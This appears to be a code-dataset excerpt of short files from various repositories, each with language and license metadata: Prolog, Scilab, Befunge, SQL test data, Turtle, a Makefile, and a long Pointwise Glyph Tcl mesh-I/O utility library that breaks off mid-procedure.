'$check_if_call_count_on'(Both, BothOn),
'$call_count_set'(Calls, CallsOn, Retries, RetriesOn, Both, BothOn).
'$check_if_call_count_on'(Calls, 1) :- integer(Calls), !.
'$check_if_call_count_on'(Calls, 0) :- var(Calls), !.
'$check_if_call_count_on'(Calls, A) :-
'$do_error'(type_error(integer,Calls),call_count(A)).
%% @}
| Prolog | 5 | KuroLevin/yap-6.3 | pl/callcount.yap | [
"Artistic-1.0-Perl",
"ClArtistic"
] |
exec("swigtest.start", -1);
// TODO: add tests here
exec("swigtest.quit", -1);
| Scilab | 1 | kyletanyag/LL-Smartcard | cacreader/swig-4.0.2/Examples/test-suite/scilab/allowexcept_runme.sci | [
"BSD-3-Clause"
] |
> v
v <
~ @
>:25*3*2+`!|
^ v\!`*9*52::>::25*2+25**2+`!\v
>25*6*4+`*v *`+6*9*52 <
, !
^ _v
^ -+2*3*52<
| Befunge | 0 | SuprDewd/BefungeSimulator | befunge_code/codeforces_130/g.befunge | [
"MIT"
] |
insert into tc values (24, '047d33e1', 6258079592828397861);
insert into tc values (23, '2243ea6f', 7088347479672485798);
insert into tc values (23, 'cea49f09', 8001462897050647577);
insert into tc values (23, 'e006730c', 7519413717684482848);
insert into tc values (22, '4f5ef461', 5346582882338619316);
insert into tc values (5, '6a439109', 1536828451068403539);
insert into tc values (23, '21ace3c9', 922347470705201988);
insert into tc values (26, '6c57945f', 48160473148417915);
insert into tc values (21, 'd6d8f6ee', 4056110477291659878);
insert into tc values (23, '20759ed6', 3751600657493053897);
insert into tc values (5, '63830654', 2617386045570170710);
insert into tc values (23, '7f5792cc', 8959454966477811865);
insert into tc values (25, 'dcae0dc0', 923824035385475923);
insert into tc values (23, '0b5cc9f9', 3377501517481580649);
insert into tc values (5, 'e88ccc95', 1799945200940483370);
insert into tc values (5, '4825909c', 4976960922359454122);
insert into tc values (23, '0f342e5f', 4839883667201182891);
insert into tc values (23, '9f7d4fe6', 1723593630324400575);
insert into tc values (23, '5bca1346', 7167167179664100530);
insert into tc values (5, '4cbf07e9', 8050395970322467361);
| SQL | 0 | cuishuang/tidb | br/tests/lightning_duplicate_detection/data/dup_detect.tc.1.sql | [
"Apache-2.0"
] |
<http://a.example/s> <http://a.example/p> _:a·̀ͯ‿.⁀ .
| Turtle | 0 | joshrose/audacity | lib-src/lv2/serd/tests/TurtleTests/labeled_blank_node_with_non_leading_extras.ttl | [
"CC-BY-3.0"
] |
-include ../../run-make-fulldeps/tools.mk
ifeq ($(TARGET),wasm32-unknown-unknown)
all:
$(RUSTC) foo.rs -C lto -O --target wasm32-unknown-unknown
wc -c < $(TMPDIR)/foo.wasm
[ "`wc -c < $(TMPDIR)/foo.wasm`" -lt "25000" ]
else
all:
endif
| Makefile | 3 | Eric-Arellano/rust | src/test/run-make/wasm-stringify-ints-small/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
#
# Copyright 2013 (c) Pointwise, Inc.
# All rights reserved.
#
# This sample script is not supported by Pointwise, Inc.
# It is provided freely for demonstration purposes only.
# SEE THE WARRANTY DISCLAIMER AT THE BOTTOM OF THIS FILE.
#
if { ![namespace exists pwio] } {
package require PWI_Glyph
#puts "pwio scriptdir='[file dirname [info script]]'"
namespace eval pwio {
#========================================================================
# utils namespace
#========================================================================
namespace eval utils {
proc assert { cond msg {exitVal -1} } {
if { ![expr $cond] } {
puts "assert failed: ($cond)"
puts "message : $msg"
if { 0 != $exitVal } {
exit $exitVal
}
}
}
proc entBaseType { ent {subTypeVarName ""} } {
if { "" != $subTypeVarName } {
upvar 1 $subTypeVarName subType
}
if { 0 == [regexp {\mpw::(Block|Domain|Connector|Node*)(Structured|Unstructured|Extruded)*} [$ent getType] -> baseType subType] } {
set baseType ""
set subType ""
} elseif { "" == $subType } {
set subType $baseType
}
return $baseType
}
proc getBlockFaces { blk } {
set faces [list]
for {set ii 1} {$ii <= [$blk getFaceCount]} {incr ii} {
lappend faces [$blk getFace $ii]
}
return $faces
}
proc getBlockDomains { blk } {
set doms [list]
foreach face [getBlockFaces $blk] {
set doms [concat $doms [getFaceDomains $face]]
}
return $doms
}
proc getFaceDomains { face } {
set doms [list]
for {set ii 1} {$ii <= [$face getDomainCount]} {incr ii} {
lappend doms [$face getDomain $ii]
}
return $doms
}
proc getFaceEdges { face } {
set edges [list]
for {set ii 1} {$ii <= [$face getEdgeCount]} {incr ii} {
lappend edges [$face getEdge $ii]
}
return $edges
}
proc getEdgeConnectors { edge } {
set cons [list]
for {set ii 1} {$ii <= [$edge getConnectorCount]} {incr ii} {
lappend cons [$edge getConnector $ii]
}
return $cons
}
proc getFaceEdgeConnectors { face } {
set cons [list]
foreach edge [getFaceEdges $face] {
set cons [concat $cons [getEdgeConnectors $edge]]
}
return $cons
}
proc getPerimeterPointCount { ent } {
set ret 0
switch -exact [$ent getType] {
pw::Node {
set ret 0
}
pw::Connector {
set ret 2
}
pw::DomainUnstructured {
set ret [$ent getPerimeterPointCount]
}
pw::DomainStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i * 2) + ($j * 2) - 4}]
}
pw::FaceUnstructured {
foreach edge [getFaceEdges $ent] {
incr ret [expr {[$edge getPointCount] - 1}]
}
}
pw::FaceStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i * 2) + ($j * 2) - 4}]
}
pw::BlockExtruded {
lassign [$ent getDimensions] numBasePts one numExtrudePts
set ret [expr {($numBasePts * 2) + (($numExtrudePts - 2) * \
[getPerimeterPointCount [$ent getFace JMinimum]])}]
}
pw::BlockUnstructured {
if { [getSupportEnts $ent supEnts] } {
foreach supEnt $supEnts {
incr ret [getOwnedPointCount $supEnt]
}
}
}
pw::BlockStructured {
lassign [$ent getDimensions] i j k
set ret [expr {(($i * $j) + ($i * ($k - 2)) + (($j - 2) * ($k - 2))) * 2}]
}
default {
assert 0 "getPerimeterPointCount: Bad Entity '[$ent getType]'"
} }
return $ret
}
proc getOwnedPointCount { ent } {
set ret 0
switch -exact [$ent getType] {
pw::Node {
set ret 1
}
pw::Connector {
set ret [expr {[$ent getPointCount] - 2}]
}
pw::DomainUnstructured {
set ret [expr {[$ent getPointCount] - [$ent getPerimeterPointCount]}]
}
pw::DomainStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i - 2) * ($j - 2)}]
}
pw::BlockUnstructured {
set ret [expr {[$ent getPointCount] - [getPerimeterPointCount $ent]}]
}
pw::BlockStructured {
lassign [$ent getDimensions] i j k
set ret [expr {($i - 2) * ($j - 2) * ($k - 2)}]
}
pw::BlockExtruded {
set ret [expr {[$ent getPointCount] - [getPerimeterPointCount $ent]}]
}
}
return $ret
}
proc isBndryEnt { ent allEnts } {
# getRegisterBoundaryConditions returns a list of {{register} parentEntity} lists
# { {::pw::BlockStructured_2 ::pw::DomainStructured_283 Opposite} ::pw::BoundaryCondition_46 }
# { {::pw::BlockStructured_3 ::pw::DomainStructured_283 Same} ::pw::BoundaryCondition_46 }
set regBCs [$ent getRegisterBoundaryConditions]
set numParents [llength $regBCs]
if {1 == $numParents} {
return true ;# hard bndry ents have only one parent
} elseif { $numParents > 2 } {
# non-manifold topology!
assert 0 "$ent $numParents has NONMANIFOLD CONNECTIVITY!"
}
# ent has 2 parents and is a cnxn UNLESS BC is applied
set ret false ;# assume cnxn
foreach regBC $regBCs {
lassign $regBC reg bc
lassign $reg parentEnt cnxnEnt orient
if { -1 == [lsearch -exact $allEnts $parentEnt] } {
# reg parent ent is not part of the export. ent is a bndry
set ret true
break
}
set bcName [$bc getName]
if { $bcName != "Unspecified" } {
# cnxn ent has BCs assigned it is a bndry
set ret true
#break
}
}
return $ret
}
proc getNodeDbEnt { node dbEntVarName } {
upvar 1 $dbEntVarName dbEnt
set dbEnt [lindex [$node getPoint] 2]
if { "::pw::" != [string range $dbEnt 0 5] } {
set dbEnt ""
}
return [expr {0 != [string length $dbEnt]}]
}
proc entLockInterior { ent } {
switch -exact [$ent getType] {
pw::Node -
pw::Connector -
pw::DomainUnstructured -
pw::DomainStructured -
pw::BlockUnstructured -
pw::BlockExtruded {
# do nothing
}
pw::BlockStructured {
while { [$ent getInteriorState] == "Locked" } {
$ent unlockInterior
}
$ent lockInterior
}
}
}
proc entUnlockInterior { ent {clearAllLocks 0} } {
switch -exact [$ent getType] {
pw::Node -
pw::Connector -
pw::DomainUnstructured -
pw::DomainStructured -
pw::BlockUnstructured -
pw::BlockExtruded {
# do nothing
}
pw::BlockStructured {
$ent unlockInterior
while { $clearAllLocks && [$ent getInteriorState] == "Locked" } {
$ent unlockInterior
}
}
}
}
proc entGetName { ent } {
set baseType [entBaseType $ent]
switch -exact $baseType {
Block -
Domain -
Connector {
set name [$ent getName]
}
Node {
# ::pw::Node_195
set name [string range $ent 6 end]
} }
return $name
}
proc entGetDimensions { ent } {
switch -exact [entBaseType $ent] {
Block { set dim [$ent getDimensions] }
Domain { set dim [$ent getDimensions] ; lappend dim 1 }
Connector { set dim [list [$ent getDimension] 1 1] }
Node { set dim [list 1 1 1] }
default { assert false "Invalid Ent Type ([entBaseType $ent])" }
}
return $dim ;# returns {i j k}
}
proc entIjkToIndex { ent ijk } {
set ret 0
set baseType [entBaseType $ent subType]
switch -exact $subType {
Node -
Connector -
Unstructured {
set ret [lindex $ijk 0] ;# grab the i
}
Structured -
Extruded {
if { "Domain" == $baseType } {
set ijk [lrange $ijk 0 1] ;# convert to ij
}
set ret [$ent getLinearIndex $ijk]
}
default {
assert false "bad subType '$subType'"
}
}
return $ret
}
proc ijkToIndexStructured { ijk ijkdim } {
lappend ijk 1 1 ;# handle an i or ij value
lassign $ijk i j k
lappend ijkdim 0 0 ;# handle an i or ij dim value
lassign $ijkdim idim jdim kdim
# ijk are 1-based. Do not subtract from $i to return a 1-based index
return [expr {($k - 1) * ($idim * $jdim) + ($j - 1) * $idim + $i}]
}
proc indexToIjkStructured { ndx ijkdim } { ;# ndx must be 1-based
lappend ijkdim 1 ;# add a null kdim to pad an ij-only value
lassign $ijkdim idim jdim kdim
assert "$ndx > 0 && $ndx <= ($idim * $jdim * $kdim)" \
"indexToIjkStructured: Invalid ndx ($ndx)"
incr ndx -1 ;# convert to 0-based index
if { $kdim != 0 } { ;# ijk
set k [expr {$ndx / ($idim * $jdim)}]
incr ndx [expr {-$k * $idim * $jdim}]
} else { ;# ij
set k 0
}
set j [expr {$ndx / $idim}]
incr ndx [expr {-$j * $idim + 1}] ;# +1 makes ndx 1-based
return [list $ndx [incr j] [incr k]] ;# return 1-based ijk's
}
proc entIndexToIjk { ent entNdx1 } { ;# entNdx1 must be 1-based
assert "$entNdx1 >= 1 && $entNdx1 <= [$ent getPointCount]" \
"entIndexToIjk: Bad Index $entNdx1 for $ent"
set ret 0
set baseType [entBaseType $ent subType]
switch -exact $subType {
Node -
Connector -
Unstructured {
set ret [list $entNdx1 1 1]
}
Structured -
Extruded {
set ret [indexToIjkStructured $entNdx1 [$ent getDimensions]]
}
default {
assert false "bad subType '$subType'"
}
}
return $ret
}
proc makeCoord { ent ijk } { ;# 1-based ijk
return [lappend ijk $ent]
}
proc makeCoordFromIjkVals { ent i j k } { ;# 1-based i j k
return [makeCoord $ent [list $i $j $k]]
}
proc makeCoordFromEntIndex { ent ndx } { ;# 1-based ndx relative to ent's pt space
return [makeCoord $ent [entIndexToIjk $ent $ndx]]
}
proc sortEntsByType { ents } {
proc compareBaseTypes {type1 type2} {
array set rank {Block 0 Domain 1 Connector 2 Node 3}
return [expr {$rank([entBaseType $type1]) - $rank([entBaseType $type2])}]
}
# sort ents in Block/Domain/Connector/Node order
return [lsort -command compareBaseTypes $ents]
}
proc pointToString { pt } {
# pt == {u v ::pw::Surface_1} or {x y z}
lassign $pt xu yv zdb
set prec "%8.5f"
if { [string equal -length 6 "::pw::" $zdb] } {
set fmt "%s"
} else {
set fmt $prec
}
return [format "\{$prec $prec $fmt\}" $xu $yv $zdb]
}
proc xyzEqual { xyz1 xyz2 {tol 1.0e-8} } {
lassign $xyz1 x1 y1 z1
lassign $xyz2 x2 y2 z2
return [expr {[valEqual $x1 $x2 $tol] && [valEqual $y1 $y2 $tol] && [valEqual $z1 $z2 $tol]}]
}
proc valEqual { val1 val2 {tol 1.0e-8} } {
return [expr {abs($val1 - $val2) < $tol}]
}
proc coordToPtString { coord } {
# pt == {u v ::pw::Surface_1} or {x y z}
set pt [pw::Grid getPoint $coord]
set ret [pointToString $pt]
if { -1 != [string first "::pw::" $ret] } {
set xyz [pw::Grid getXYZ $coord]
set ret "[pointToString $xyz] @ $ret"
}
return $ret
}
proc vcToString { vc } {
set vcName [$vc getName]
if {$vcName == "Unspecified" } {
return $vcName
}
return "$vcName [$vc getId] [$vc getPhysicalType]"
}
proc labelPt { ndx pt } {
lassign $pt x y z
set noteHt 0.04
set note [pw::Note create]
$note setText "$ndx"
$note setPosition [list $x $y $z]
$note setSize $noteHt
$note setColor 0x0000FF00
$note setRenderAttribute ColorMode Entity
}
proc printEntInfo { title ents {dim 0} {allEnts {}} } {
proc compareBaseTypes {type1 type2} {
array set rank {Block 0 Domain 1 Connector 2 Node 3}
return [expr {$rank([entBaseType $type1]) - $rank([entBaseType $type2])}]
}
# sort ents in Block/Domain/Connector/Node order
set ents [lsort -command compareBaseTypes $ents]
set fmt "| %-30.30s | %-20.20s | %10.10s | %6.6s | %-13.13s | %-10.10s | %-5.5s |"
puts "$title"
puts [format $fmt "Entity" "Name" "NumPts" "DbPts" "Dim" "BaseType" "BorC"]
set tmp [string repeat "-" 50]
puts [format $fmt $tmp $tmp $tmp $tmp $tmp $tmp $tmp]
foreach ent $ents {
array set eInfo [list Name "[entGetName $ent]" NumPts "" DbPts "" Dim "" Bndry ""]
set baseType [entBaseType $ent]
switch -exact $baseType {
Block -
Domain {
#set eInfo(Name) [$ent getName]
set eInfo(NumPts) [$ent getPointCount -constrained eInfo(DbPts)]
set eInfo(Dim) [$ent getDimensions]
if { $baseType == "Domain" && $dim == 3 } {
if { [isBndryEnt $ent $allEnts] } {
set eInfo(Bndry) "Bndry"
} else {
set eInfo(Bndry) "Cnxn"
}
}
}
Connector {
#set eInfo(Name) [$ent getName]
set eInfo(NumPts) [$ent getPointCount -constrained eInfo(DbPts)]
set eInfo(Dim) [$ent getDimension]
if { $dim == 2 } {
if { [isBndryEnt $ent $allEnts] } {
set eInfo(Bndry) "Bndry"
} else {
set eInfo(Bndry) "Cnxn"
}
}
}
Node {
#set eInfo(Name) ""
set eInfo(NumPts) 1
set eInfo(DbPts) [getNodeDbEnt $ent ignore]
set eInfo(Dim) 1
} }
if { $eInfo(DbPts) == 0 } {
set eInfo(DbPts) ""
}
puts [format $fmt $ent $eInfo(Name) $eInfo(NumPts) $eInfo(DbPts) $eInfo(Dim) $baseType $eInfo(Bndry)]
}
}
proc getSelection { selType selectedVarName errMsgVarName } {
upvar 1 $selectedVarName selected
upvar 1 $errMsgVarName errMsg
array set validSelTypes { \
Connector 0 \
Domain 1 \
Block 2 \
Database 3 \
Spacing 4 \
Boundary 5 \
}
array set typeFilters { \
Connector {Dimensioned} \
Domain {Defined} \
Block {Defined} \
Database {Models Quilts} \
Spacing {Begin End} \
DatabaseBoundary {} \
}
set ret 0
set selected {}
set allEnts [pw::Grid getAll -type "pw::$selType"]
set gridCnt 0
foreach ent $allEnts {
if { [$ent getEnabled] && [pw::Display isLayerVisible [$ent getLayer]] } {
incr gridCnt
lappend selected $ent
}
}
if { "" == [array get validSelTypes $selType] } {
set errMsg "Invalid Selection Type '$selType'"
} elseif { 0 == $gridCnt } {
set errMsg "No appropriate $selType entities are available for selection!"
} elseif { 1 == $gridCnt } {
# force selection of only $selType ent available
set ret 1
} else {
set filter $typeFilters($selType)
# set selection based on current 2D/3D setting
set mask [pw::Display createSelectionMask -require$selType $filter]
if { [pw::Display selectEntities \
-description "Select $selType\s" \
-selectionmask $mask \
picks] } {
set selected $picks($selType\s)
set ret 1
} else {
set errMsg "$selType selection aborted!"
}
}
return $ret
}
# returns true/false
# support ents placed in supEntsVarName
# if addEnts is true, ents will also be added to supEntsVarName
proc getSupportEnts { ents supEntsVarName {addEnts false}} {
upvar 1 $supEntsVarName supEnts
set supEnts [list]
array set unique {} ;# empty array - used to track unique ent names
foreach ent $ents {
if { "" == [set base [entBaseType $ent]] } {
continue ; # BAD!
}
set funcName "getSupportEnts_Private::push$base\AndSupportEnts"
$funcName $ent unique $addEnts
}
# extract the list of unique entity names
set supEnts [array names unique]
return [expr {0 != [llength $supEnts]}]
}
namespace eval getSupportEnts_Private {
proc pushBlockAndSupportEnts { blk uniqueVarName {addBlk true}} {
upvar 1 $uniqueVarName unique
if { "" == [array names unique -exact $blk] } {
if { $addBlk } {
set unique($blk) 1 ;# add to array
}
set faceCnt [$blk getFaceCount]
for {set ii 1} {$ii <= $faceCnt} {incr ii} {
set face [$blk getFace $ii]
set domCnt [$face getDomainCount]
for {set jj 1} {$jj <= $domCnt} {incr jj} {
pushDomainAndSupportEnts [$face getDomain $jj] unique
}
}
}
}
proc pushDomainAndSupportEnts { dom uniqueVarName {addDom true}} {
upvar 1 $uniqueVarName unique
if { "" == [array names unique -exact $dom] } {
if { $addDom } {
set unique($dom) 1 ;# add to array
}
set edgeCnt [$dom getEdgeCount]
for {set ii 1} {$ii <= $edgeCnt} {incr ii} {
set edge [$dom getEdge $ii]
set conCnt [$edge getConnectorCount]
for {set jj 1} {$jj <= $conCnt} {incr jj} {
pushConnectorAndSupportEnts [$edge getConnector $jj] unique
}
}
}
}
proc pushConnectorAndSupportEnts { con uniqueVarName } {
upvar 1 $uniqueVarName unique
# if con is not in array, process it
if { "" == [array names unique -exact $con] } {
set unique($con) 1 ;# add to array
pushNodeAndSupportEnts [$con getNode Begin] unique
pushNodeAndSupportEnts [$con getNode End] unique
}
}
proc pushNodeAndSupportEnts { node uniqueVarName } {
upvar 1 $uniqueVarName unique
# if node is not in array, process it
if { "" == [array names unique -exact $node] } {
set unique($node) 1 ;# add to array
# nodes do NOT have support ents - all done!
}
}
} ;# namespace eval getSupportEnts_Private
}
#========================================================================
# cell namespace
#========================================================================
namespace eval cell {
# key = "dim,numCellPts"
# val = "edge1p1 edge1p2 edge2p1 edge2p2 ... edgeNp1 edgeNp2"
variable edgeMap ; array set edgeMap {
"2e3" { 0 1 1 2 2 0 } ;# tri
"2e4" { 0 1 1 2 2 3 3 0 } ;# quad
"3e4" { 0 1 1 2 2 0 0 3 1 3 2 3 } ;# tet
"3e5" { 0 1 1 2 2 3 3 0 0 4 1 4 2 4 3 4 } ;# pyramid
"3e6" { 0 1 1 2 2 0 3 4 4 5 5 3 0 3 1 4 2 5 } ;# prism
"3e8" { 0 1 1 2 2 3 3 0 4 5 5 6 6 7 7 4 0 4 1 5 2 6 3 7 } ;# hex
}
# key = "dim,numCellPts"
# val = "{face1} {face2} ... {faceN}"
variable faceMap ; array set faceMap {
"2f3" { {0 1} {1 2} {2 0} } ;# tri
"2f4" { {0 1} {1 2} {2 3} {3 0} } ;# quad
"3f4" { {0 1 2} {0 3 1} {1 3 2} {2 3 0} } ;# tet
"3f5" { {0 1 2 3} {0 4 1} {1 4 2} {2 4 3} {3 4 0} } ;# pyramid
"3f6" { {0 1 2} {3 5 4} {0 3 4 1} {1 4 5 2} {2 5 3 0} } ;# prism
"3f8" { {0 1 2 3} {4 7 6 5} {0 4 5 1} {1 5 6 2} {2 6 7 3} {3 7 4 0} } ;# hex
}
proc getEdges { cell {minFirstOrder 0} {revVarName ""} } {
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set key "$pwio::caeDim\e[llength $cell]"
variable edgeMap
pwio::utils::assert "\"\" != \"[array names edgeMap $key]\"" "Invalid cell edgeMap key: '$key'"
set ret [list]
set rev [list]
set map $edgeMap($key)
foreach {i1 i2} $map {
set v1 [lindex $cell $i1]
set v2 [lindex $cell $i2]
if { $minFirstOrder && ($v2 < $v1) } {
lappend ret [list $v2 $v1]
lappend rev 1
} else {
lappend ret [list $v1 $v2]
lappend rev 0
}
}
return $ret
}
proc getFaceEdges { face {minFirstOrder 0} {revVarName ""} } {
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set key "2\e[llength $face]"
variable edgeMap
pwio::utils::assert "\"\" != \"[array names edgeMap $key]\"" "Invalid cell edgeMap key: '$key'"
set ret [list]
set rev [list]
set map $edgeMap($key)
foreach {i1 i2} $map {
set v1 [lindex $face $i1]
set v2 [lindex $face $i2]
if { $minFirstOrder && ($v2 < $v1) } {
lappend ret [list $v2 $v1]
lappend rev 1
} else {
lappend ret [list $v1 $v2]
lappend rev 0
}
}
return $ret
}
proc getFaces { cell {minFirstOrder 0} } {
variable faceMap
set f f
set key "$pwio::caeDim$f[llength $cell]"
pwio::utils::assert "\"\" != \"[array names faceMap $key]\"" "Invalid cell faceMap key: '$key'"
set ret [list]
set map $faceMap($key)
foreach faceIndices $map { ;# faceIndices is a list of cell local indices
set face [list]
foreach ndx $faceIndices {
lappend face [lindex $cell $ndx]
}
if {$minFirstOrder} {
set minIdx 0
set minVal [lindex $face $minIdx]
for {set j 1} {$j < [llength $face]} {incr j} {
if {[set val [lindex $face $j]] < $minVal} {
set minVal $val
set minIdx $j
}
}
if {$minIdx > 0} {
set minFirstFace [concat [lrange $face $minIdx end] \
[lrange $face 0 [expr {$minIdx - 1}]]]
} else {
set minFirstFace $face
}
lappend ret $minFirstFace
} else {
lappend ret $face
}
}
return $ret
}
}
#========================================================================
# pwio variables
#========================================================================
# misc variables
variable selEnts [list]
variable caeDim [pw::Application getCAESolverDimension]
variable perimPtCountCache ;# maps an ent to its num of perim points
array set perimPtCountCache {}
# coords db variables
variable coordSingleEnt ""
variable entToCoordTotalsOffset ; array set entToCoordTotalsOffset {} ;# maps an ent to its offset into coordTotals list
variable coordTotals [list] ;# list of {entOwnedPts totalOwnedPts ent} lists
variable totalOwnedPts 0
variable ndxCoordTotals 0 ;# cached index into coordTotals list
variable offsetGlobToLocalGetCoord 0 ;# cached global to owned index offset: globNdx = ownedNdx + offsetGlobToLocalGetCoord
variable prevCoordEntName "@null" ;# cached name of previous coord entity enumerated
variable offsetGlobToLocalGetCoordIndex 0 ;# cached global to owned index offset: globNdx = ownedNdx + offsetGlobToLocalGetCoordIndex
# cells db variables
variable cellSingleEnt ""
variable totalCellCount 0
variable cellTotals [list] ;# list of {entCellCount totalEntCellCount ent} lists
variable entToCellTotalsOffset ;# maps an ent to its offset into cellTotals list
array set entToCellTotalsOffset {}
variable ndxCellTotals 0 ;# cached index into cellTotals list
variable offsetGlobToLocalGetCell 0 ;# cached global to cell index offset: globCellNdx = entCellNdx + offsetGlobToLocalGetCell
variable prevCellEntName "@null" ;# cached name of previous cell entity enumerated
variable offsetGlobToLocalGetCellIndex 0 ;# cached global to cell index offset: globNdx = cellNdx + offsetGlobToLocalGetCellIndex
#public
#========================================================================
namespace export beginIO
proc beginIO { ents } {
variable selEnts
reset
set selEnts $ents
build
foreach ent $selEnts {
utils::entLockInterior $ent
}
}
#========================================================================
namespace export endIO
proc endIO { {clearAllLocks 0} } {
variable selEnts
foreach ent $selEnts {
utils::entUnlockInterior $ent $clearAllLocks
}
}
#========================================================================
namespace export getCoordCount
proc getCoordCount {} {
variable totalOwnedPts
return $totalOwnedPts
}
#========================================================================
namespace export getCoord
proc getCoord { enumNdx } { ;# 1-based index
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable totalOwnedPts
variable ndxCoordTotals
variable offsetGlobToLocalGetCoord
utils::assert "$enumNdx >=1 && $enumNdx <= $totalOwnedPts" \
"Invalid global index in pwio::getCoord($enumNdx)"
set ret {} ;# GgGridCoord
if { "" != $coordSingleEnt } {
return [utils::makeCoordFromEntIndex $coordSingleEnt $enumNdx]
}
incr enumNdx -1 ;# convert to 0-based index
# indexes will typically be looped over from 0 to NumPts, so we cache
# the ndxCoordTotals index into the coordTotals list and offsetGlobToLocalGetCoord
if { $enumNdx == [lindex $coordTotals $ndxCoordTotals 1] } {
# moving to the next position in the coordTotals array
set offsetGlobToLocalGetCoord [lindex $coordTotals $ndxCoordTotals 1]
incr ndxCoordTotals
} elseif { $enumNdx < $offsetGlobToLocalGetCoord || $enumNdx >= [lindex $coordTotals $ndxCoordTotals 1] } {
# not in the cached range, so do a binary search to find the correct range
set lo 0
set hi [llength $coordTotals]
while { $lo < $hi } {
set mid [expr {($lo + $hi) / 2}]
if { [lindex $coordTotals $mid 1] <= $enumNdx } {
set lo [incr mid];
} else {
set hi $mid
}
}
set ndxCoordTotals $lo
if { $ndxCoordTotals == 0 } {
set offsetGlobToLocalGetCoord 0
} else {
set offsetGlobToLocalGetCoord [lindex $coordTotals [incr lo -1] 1]
}
}
incr enumNdx ;# convert back to 1-based index
set ent [lindex $coordTotals $ndxCoordTotals 2]
set ownedNdx [expr {$enumNdx - $offsetGlobToLocalGetCoord}]
set entIjk [entOwnedIndexToIjk $ent $ownedNdx]
return [utils::makeCoord $ent $entIjk]
}
#========================================================================
namespace export getCoordIndex
proc getCoordIndex { coord {mapCoordToOwner 1} } {
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable prevCoordEntName
variable offsetGlobToLocalGetCoordIndex
if { "" != $coordSingleEnt } {
if { $coordSingleEnt == [coordGetEntity $coord] } {
return [utils::entIjkToIndex $coordSingleEnt [coordGetIjk $coord]]
} elseif { [coordMapToEntity $coord $coordSingleEnt coords] > 0 } {
return [utils::entIjkToIndex $coordSingleEnt [coordGetIjk [lindex $coords 0]]]
} else {
utils::assert false "pwio::getCoordIndex: Could not map coord ($coord) to coordSingleEnt"
}
}
if { $mapCoordToOwner } {
set ownerCoord [mapToOwner $coord]
set ent [coordGetEntity $ownerCoord]
set ijk [coordGetIjk $ownerCoord]
} else {
set ent [coordGetEntity $coord]
set ijk [coordGetIjk $coord]
}
if { $ent != $prevCoordEntName } {
set match [array get entToCoordTotalsOffset $ent]
if { 2 != [llength $match] } {
utils::assert false "pwio::getCoordIndex: Entity not found ($ent) '$match'"
}
# match is {ent offset} list
lassign $match -> totalsOffset
set prevCoordEntName $ent
set offsetGlobToLocalGetCoordIndex [lindex $coordTotals [expr {$totalsOffset - 1}] 1]
}
set ret [entIjkToOwnedIndex $ent $ijk]
if { $offsetGlobToLocalGetCoordIndex > 0 } {
# owned indices after the first range must be offset to the enum's
# index space
incr ret $offsetGlobToLocalGetCoordIndex
}
return $ret
}
#========================================================================
namespace export getCellCount
proc getCellCount {} {
variable totalCellCount
return $totalCellCount
}
#========================================================================
namespace export getCell
proc getCell { enumNdx {vcVarName ""} } { ;# 1-based index
if { "" != $vcVarName } {
upvar 1 $vcVarName vc
}
variable cellSingleEnt
variable entToCellTotalsOffset
variable cellTotals
variable totalCellCount
variable ndxCellTotals
variable offsetGlobToLocalGetCell
utils::assert "$enumNdx >=1 && $enumNdx <= $totalCellCount" \
"Invalid global index in pwio::getCell($enumNdx)"
set ret [list] ;# cell indices
if { "" != $cellSingleEnt } {
set vc [$cellSingleEnt getVolumeCondition]
return [getEntityCell $cellSingleEnt $enumNdx]
}
incr enumNdx -1 ;# convert to 0-based index
# indexes will typically be looped over from 0 to NumCells, so we cache
# the prior index into the cellTotals list (ndxCellTotals) and the prior
# index offset (offsetGlobToLocalGetCell)
if { $enumNdx == [lindex $cellTotals $ndxCellTotals 1] } {
# move to the next position in the cellTotals array
set offsetGlobToLocalGetCell [lindex $cellTotals $ndxCellTotals 1]
incr ndxCellTotals
#puts "ndx=$enumNdx next block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
} elseif { $enumNdx < $offsetGlobToLocalGetCell || $enumNdx >= [lindex $cellTotals $ndxCellTotals 1] } {
# not in the cached range, so do a binary search to find the correct range
set lo 0
set hi [llength $cellTotals]
while { $lo < $hi } {
set mid [expr {($lo + $hi) / 2}]
if { [lindex $cellTotals $mid 1] <= $enumNdx } {
set lo [incr mid];
} else {
set hi $mid
}
}
set ndxCellTotals $lo
if { $ndxCellTotals == 0 } {
set offsetGlobToLocalGetCell 0
} else {
set offsetGlobToLocalGetCell [lindex $cellTotals [incr lo -1] 1]
}
#puts "ndx=$enumNdx find block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
} else {
#puts "ndx=$enumNdx using block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
}
set vc [[set ent [lindex $cellTotals $ndxCellTotals 2]] getVolumeCondition]
# +1 converts enumNdx back to 1-based index
# return [getEntityCell ent entNdx]
return [getEntityCell $ent [expr {$enumNdx + 1 - $offsetGlobToLocalGetCell}]]
}
#========================================================================
namespace export getCellIndex
proc getCellIndex { ent entNdx } { ;# 1-based index into ent's cell space
variable cellSingleEnt
variable entToCellTotalsOffset
variable cellTotals
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
if { "" != $cellSingleEnt } {
if { $cellSingleEnt == $ent } {
return $entNdx
} else {
utils::assert false "pwio::getCellIndex: Invalid entity ($ent)"
}
}
if { $ent != $prevCellEntName } {
set match [array get entToCellTotalsOffset $ent]
if { 2 != [llength $match] } {
utils::assert false "pwio::getCellIndex: Entity not found ($ent) '$match'"
}
# match is {ent offset} list
lassign $match -> totalsOffset
set prevCellEntName $ent
set offsetGlobToLocalGetCellIndex [lindex $cellTotals [expr {$totalsOffset - 1}] 1]
}
if { $offsetGlobToLocalGetCellIndex > 0 } {
# cell indices after the first range must be offset to the enum's
# index space
incr entNdx $offsetGlobToLocalGetCellIndex
}
return $entNdx
}
#========================================================================
namespace export getCellEdges
proc getCellEdges { enumNdx {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
